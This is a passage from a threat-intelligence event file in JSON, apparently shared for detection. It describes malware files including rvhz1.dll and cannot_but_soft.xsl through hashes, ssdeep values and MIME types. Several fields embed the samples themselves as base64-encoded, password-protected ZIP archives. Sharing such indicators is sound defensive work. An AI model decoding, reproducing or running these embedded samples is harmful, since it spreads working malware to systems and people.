fjUkPZy5eNRgPxUX2cbtmt5yGz1RjDe14u2RRK2h6BN2J4w/9TXKJk5q8MeN3B2EucNozoUIfZRPOFWuRbVCrcloBnuqwwkK5sSGQDTBvxhYTi5oAj0oKQuVW5Kg/F2lz+MqwDeXXI0KFS2nHdX9mjZ5vWQ5L7oeH4aekanRtUkAENaSIDc2bSsju/y3KEtVEWOLvRwsDaPvrg6MKEZ8j8HYprjb0UhxkL1vC7KOurREfvXuIrd17xs6Mbs01jduklL8XxWMuQNdpRlxNwlMfjk7HPk9vzqnoRVs0aDApDuwnKKyNHGLWNM4PSOuHRkOYQ05rPueTsgFZt+ufekjc6k8RdrRVsFnQEgOQg9OHW4YniBgDOtX8zNbW1hKdFZ6qOgh41MhpfBCFEiPu+vSAy+g6xhcfSXzk0L9yUkibpgoUl6WwMw60x+dEUd+DtFKm9ykb4mLI2flu1zHFq81e6OZvwULutGVeP3ydMinHTvqxAa9LkpJxG7/Lxkj06beTnwJxo6Ud16oR+FfLnLXNctESWon3UgxM3q/4k5MRIlk1BQajgQVvraIU+RX
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1595185525",
"to_ids": true,
"type": "malware-sample",
"uuid": "734513d7-229d-49d2-bf70-d1e049cd38fc",
"value": "pse.bin|dfb1fd17182503b2f15fbf6c5c30ff71"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "mimetype",
"timestamp": "1595185551",
"to_ids": false,
"type": "mime-type",
"uuid": "ff9715e7-6d9d-43c2-811f-39e02e7085b9",
"value": "application/x-dosexec"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1595185552",
"to_ids": true,
"type": "ssdeep",
"uuid": "f6cfef20-290e-4c35-818d-040c36465cff",
"value": "384:xkHY4guhZuogdd+KEiCZfl/yGFj0KdHf4gphQTDHzJ8k6X5ihHfzwyU/9tRKhD27:f4JhymiCz/7mk3QHHaXIhLJUpKMsm"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "20",
"timestamp": "1595202916",
"uuid": "612fb261-eeee-4173-a89d-074aad7c64d2",
"Attribute": [
{
"category": "Artifacts dropped",
"comment": "",
"data": "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
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1595202926",
"to_ids": true,
"type": "malware-sample",
"uuid": "389c9f0d-063b-49be-9208-74e997b8dac4",
"value": "rvhz1.dll|db91c4531aa46ce160a71b9c74c800bb"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1595202950",
"to_ids": false,
"type": "filename",
"uuid": "9dc5214d-7dcc-47ec-987f-b5f24d2d39fc",
"value": "rvhz1.dll"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1595202974",
"to_ids": true,
"type": "md5",
"uuid": "b7fb681d-0a81-446a-8f2f-e62d07615185",
"value": "db91c4531aa46ce160a71b9c74c800bb"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1595202988",
"to_ids": true,
"type": "sha1",
"uuid": "a5d8a2bc-e0f6-4135-8d8d-02ee487fc7be",
"value": "cf45535c5d392bfd58fb385edb46798d64793d98"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1595203000",
"to_ids": true,
"type": "sha256",
"uuid": "2ff37830-c5e8-4806-9f8b-287a608b7c32",
"value": "076547c290c80627993690a9e6c15eeb2ac9b86a9a33af2d3dbaab135f1f43ab"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1595203012",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "5fb680db-b950-4c64-a5f6-6ec12c150793",
"value": "376832"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "20",
"timestamp": "1595203257",
"uuid": "513494bf-37dd-4704-a5ea-15155c29c4fc",
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "filename",
"timestamp": "1595203257",
"to_ids": true,
"type": "filename",
"uuid": "b19f8473-3fcd-4f4b-9191-24d52603d218",
"value": "rvhz1.dll"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1595203257",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "6ebe40d1-bc59-40c6-bbe9-bde32e6e36ba",
"value": "376832"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1595203257",
"to_ids": false,
"type": "float",
"uuid": "78ae1b4c-ce75-4459-81dc-b04b778f22dc",
"value": "5.6641336975925"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1595203257",
"to_ids": true,
"type": "md5",
"uuid": "91b7f977-b6d2-44b0-8463-39dfd6251646",
"value": "db91c4531aa46ce160a71b9c74c800bb"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1595203275",
"to_ids": true,
"type": "sha1",
"uuid": "487e8dd3-f67c-4643-a52f-613173525622",
"value": "cf45535c5d392bfd58fb385edb46798d64793d98"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1595203288",
"to_ids": true,
"type": "sha256",
"uuid": "74140a28-8b40-43af-8c24-2d36980a4395",
"value": "076547c290c80627993690a9e6c15eeb2ac9b86a9a33af2d3dbaab135f1f43ab"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1595203299",
"to_ids": true,
"type": "sha512",
"uuid": "c1ee1370-1172-468a-b261-9f237ce6b189",
"value": "ef843483c3f097617850b88146de88e5758841a6442d8097483a082717aeef48c4ba02f7320671378efd28afd1c1245e0207140be3c255e7470925d86e3b1bd8"
},
{
"category": "Payload delivery",
"comment": "",
"data": "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
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1595203323",
"to_ids": true,
"type": "malware-sample",
"uuid": "67ebe084-f25e-4291-b8f6-174f3550bad8",
"value": "rvhz1.dll|db91c4531aa46ce160a71b9c74c800bb"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "mimetype",
"timestamp": "1595203360",
"to_ids": false,
"type": "mime-type",
"uuid": "94b6c264-cf74-4c05-94e4-6964543a259e",
"value": "application/x-dosexec"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1595203372",
"to_ids": true,
"type": "ssdeep",
"uuid": "ddf766a1-4091-42ea-8def-287658a6250a",
"value": "6144:krMZ//+TcHKiFX1F5UsCj+2s4wsMAAJb7WjMAuk5XalWUdc2Cb:Dt+TcVFF5TUU4wtb7WgAr545e"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "20",
"timestamp": "1595203422",
"uuid": "22e9a211-22e7-45d2-9b39-33a01b5e9c69",
"Attribute": [
{
"category": "Artifacts dropped",
"comment": "",
"data": "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",
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1595203422",
"to_ids": true,
"type": "malware-sample",
"uuid": "a0fc7369-e904-42c5-a9cb-cfa69c5bb70e",
"value": "cannot_but_soft.xsl|afaf378fa1d6c00d71e5a01f94fd940e"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1595203483",
"to_ids": false,
"type": "filename",
"uuid": "234e6bb5-ce3b-47a0-903a-0020b3d06b1d",
"value": "cannot_but_soft.xsl"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1595203505",
"to_ids": true,
"type": "md5",
"uuid": "977156f1-dfdb-4065-a14b-ce6c78748c43",
"value": "afaf378fa1d6c00d71e5a01f94fd940e"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
